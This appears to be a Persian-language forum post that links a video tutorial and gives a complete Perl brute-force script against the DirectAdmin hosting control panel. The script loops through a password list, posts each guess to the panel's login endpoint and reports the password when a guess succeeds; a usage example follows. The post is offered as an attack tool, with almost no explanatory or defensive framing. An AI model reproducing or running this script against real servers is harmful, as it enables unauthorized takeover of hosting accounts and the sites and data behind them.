کلیپ تصویری نحوه Attack به یک دایرکت ادمین از طریق حملات بروت فورس به همراه اکسپلویت :
[align=left]
[/align]
[align=left]
[/align]
دانلود آموزش تصویری
[align=left]
کد:
#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request; print q( ======================================================== # directadmin brute forcer perl ======================================================== ); my $host = $ARGV[0]; my $port = $ARGV[1]; my $user = $ARGV[2]; my $list = $ARGV[3]; die " usage : perl $0 [host] [user][list] \n - \n Ex : perl $0 http://localhost/ 2222 direct pass.txt\n" unless $ARGV[3]; if($host !~ /http:\/\//) { $host = "http://$host"; } my $useragaint = new LWP::UserAgent; open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @LISTS = <PASSFILE>; close PASSFILE; foreach my $L (@LISTS) { chomp $L; $pwd = $L; my $response = $useragaint->post($host.":".$port."/CMD_LOGIN", { "username" => "$user", "password" => "$pwd", }); if ($content = $response->content=~ /<h1>Invalid login. Please verify your Username and Password<\/h1>/) { print "[-] password : $pwd Is Incorrect . \n"; } else { print "\n\n[+] PASSWORD FOUND : $pwd\n"; exit() } }
[align=left]
کد:
perl $0 http://localhost/ 2222 direct pass.txt
دانلود آموزش تصویری